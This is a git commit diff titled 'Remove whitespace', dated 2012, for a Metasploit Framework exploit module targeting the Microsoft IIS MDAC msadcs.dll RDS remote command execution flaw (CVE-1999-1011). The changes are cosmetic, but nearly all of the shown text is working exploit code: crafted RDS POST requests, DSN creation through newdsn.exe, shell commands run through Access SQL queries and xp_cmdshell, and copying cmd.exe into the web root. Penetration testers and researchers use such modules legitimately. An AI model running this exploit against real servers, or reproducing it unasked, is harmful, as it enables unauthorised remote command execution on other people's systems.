Remove whitespace

unstable
sinn3r 2012-06-06 11:10:05 -05:00
parent bedfd6f9eb
commit 6d0dbcb106
1 changed files with 36 additions and 44 deletions

View File

@ -1,7 +1,3 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -20,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize
super(
'Name' => 'Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution',
'Name' => 'Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution',
'Description' => %q{
This module can be used to execute arbitrary commands on IIS servers
that expose the /msadc/msadcs.dll Microsoft Data Access Components
@ -39,20 +35,19 @@ class Metasploit3 < Msf::Exploit::Remote
and useful for debugging. Also set NAME to obtain the remote hostname,
and METHOD to use the alternative VbBusObj technique.
},
'Author' => 'patrick',
'Version' => '$Revision$',
'Platform' => 'win',
'References' =>
'Author' => 'patrick',
'Platform' => 'win',
'References' =>
[
['OSVDB', '272'],
['BID', '529'],
['CVE', '1999-1011'],
['MSB', 'ms98-004'],
['MSB', 'ms99-025'],
['MSB', 'ms99-025']
],
'Targets' =>
'Targets' =>
[
# patrickw tested meterpreter OK 20120601
# patrickw tested meterpreter OK 20120601
# nt4server w/sp3, ie4.02, option pack, IIS4.0, mdac 1.5, over msaccess shell, reverse_nonx
# w2k w/sp0, IIS5.0, mdac 2.7 RTM, sql2000, handunsf.reg, over xp_cmdshell, reverse_tcp
[ 'Automatic', { } ],
@ -91,11 +86,11 @@ class Metasploit3 < Msf::Exploit::Remote
def create_dsn(drive, dsn)
req = "/scripts/tools/newdsn.exe?driver=Microsoft\%2BAccess\%2BDriver\%2B\%28*.mdb\%29\&dsn=#{dsn}\&dbq=#{drive}\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr="
res = send_request_raw({
'uri' => req,
'uri' => req,
})
if (res and res.code == 200 and res.body =~ /<H2>Datasource creation <B>FAILED! The most likely cause is invalid attributes<\/B><\/H2>/)
vprint_error("DSN CREATE failed for drive #{drive} with #{dsn}.")
return false
@ -104,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
return true
end
end
def exec_cmd(sql, cmd, d)
boundary = rand_text_alphanumeric(8)
method = datastore['METHOD'] ? "VbBusObj.VbBusObjCls.GetRecordset" : "AdvancedDataFactory.Query"
@ -118,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote
end
vprint_status("Attempting to request: #{select} on #{d}")
query = "\x02\x00\x03\x00\x08\x00#{[select.size].pack('S')}\x00\x00#{select}\x08\x00#{[dsn.size].pack('S')}\x00\x00#{dsn}"
sploit = "--#{boundary}\r\n"
sploit = "--#{boundary}\r\n"
sploit << "Content-Type: application/x-varg\r\n"
sploit << "Content-Length: #{query.length}\r\n\r\n"
sploit << query
sploit << "\r\n--#{boundary}--\r\n"
data = "ADCClientVersion:01.06\r\n"
data << 'Content-Type: multipart/mixed; boundary=' + boundary +'; num-args=3'
data << "\r\n\r\n"
@ -140,14 +135,12 @@ class Metasploit3 < Msf::Exploit::Remote
'Content-Length' => data.length,
'Connection' => "Keep-Alive",
},
'method' => 'POST',
'data' => data,
})
response = Rex::Text.to_ascii(res.body, 'utf-16be')
if (response =~ /HTTP:\/\/www.microsoft.com\/activex.vip\/adofx/ || res.body =~ /o.u.t.p.u.t./)
vprint_good("Command was successfully executed! Statement: #{select} Driver: #{d}")
return true, sql, d
@ -190,7 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
vprint_error("Server accepted request however it failed for reasons unknown.")
elsif (res.body =~ /\x09\x00\x01/) # magic bytes? rfp used it too :P maybe a retval?
vprint_error("Unknown reply - but the command didn't execute")
else
else
vprint_status("Unknown reply - server is likely patched:\n#{response}")
end
return false
@ -205,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
data = "ADCClientVersion:01.06\r\n"
data << 'Content-Type: multipart/mixed; boundary=' + boundary +'; num-args=0'
data << "\r\n\r\n--#{boundary}--\r\n"
res = send_request_raw({
'uri' => datastore['PATH'] + '/VbBusObj.VbBusObjCls.GetMachineName',
'agent' => 'ACTIVEDATA',
@ -214,12 +207,11 @@ class Metasploit3 < Msf::Exploit::Remote
'Content-Length' => data.length,
'Connection' => "Keep-Alive",
},
'method' => 'POST',
'data' => data,
})
if (res.code == 200 and res.body =~ /\x01(.+)/) # Should return the hostname
print_good("Hostname: #{$1}")
end
@ -237,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote
"\\system32\\ias\\ias.mdb",
"\\system32\\ias\\dnary.mdb",
"\\system32\\certlog\\certsrv.mdb" ]
mdbs = [ "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", #these are non-windows
"\\cfusion\\cfapps\\forums\\forums_.mdb",
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
@ -255,16 +247,16 @@ class Metasploit3 < Msf::Exploit::Remote
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
]
print_status("Step 1: Trying raw driver to btcustmr.mdb")
drives.each do |drive|
sysdirs.each do |sysdir|
ret = exec_cmd("Select * from Customers where City=", "cmd /c echo x", "driver={Microsoft Access Driver (*.mdb)};dbq=#{drive}:\\#{sysdir}\\help\\iis\\htm\\tutorial\\btcustmr.mdb;")
return ret if (ret)
end
end
print_status("Step 2: Trying to make our own DSN...")
x = false # Stop if we make a DSN
drives.each do |drive|
@ -274,21 +266,21 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
end
table = rand_text_alphanumeric(3)
print_status("Step 3: Trying to create a new table in our own DSN...")
exec_cmd("create table #{table} (B int, C varchar(10))", nil, "driver={Microsoft Access Driver (*.mdb)};dbq=c:\\sys.mdb;") # this is general make table query
print_status("Step 4: Trying to execute our command via our own DSN and table...")
ret = exec_cmd("select * from #{table} where C=", "cmd /c echo x", "driver={Microsoft Access Driver (*.mdb)};dbq=c:\\sys.mdb;") # this is general exploit table query
return ret if (ret)
print_status("Step 5: Trying to execute our command via known DSNs...")
dsns.each do |dsn|
ret = exec_cmd("select * from MSysModules where name=", "cmd /c echo x", dsn) # this is table-independent query (new)
return ret if (ret)
end
print_status("Step 6: Trying known system .mdbs...")
drives.each do |drive|
sysdirs.each do |sysdir|
@ -299,7 +291,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
end
print_status("Step 7: Trying known program file .mdbs...")
drives.each do |drive|
mdbs.each do |mdb|
@ -308,14 +300,14 @@ class Metasploit3 < Msf::Exploit::Remote
return ret if (ret)
end
end
print_status("Step 8: Trying SQL xp_cmdshell method...")
ret = exec_cmd("EXEC master..xp_cmdshell", "cmd /c echo x", "driver={SQL Server};server=(#{datastore['DBHOST']});database=#{datastore['DBNAME']};uid=#{datastore['DBUID']};pwd=#{datastore['DBPASSWORD']}") # based on hdm's sqlrds.pl :)
return ret if (ret)
return -1
end
def exploit
print_status("Searching for valid command execution point...")
x = false
@ -325,10 +317,10 @@ class Metasploit3 < Msf::Exploit::Remote
break
end
end
if (x == true)
print_good("Successful command execution found!")
# now copy the file
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...")
@ -396,7 +388,7 @@ class Metasploit3 < Msf::Exploit::Remote
def cleanup
framework.events.remove_exploit_subscriber(self)
end
def execute_command(cmd, opts = {})
# Don't try the start command...
# Using the "start" method doesn't seem to make iis very happy :(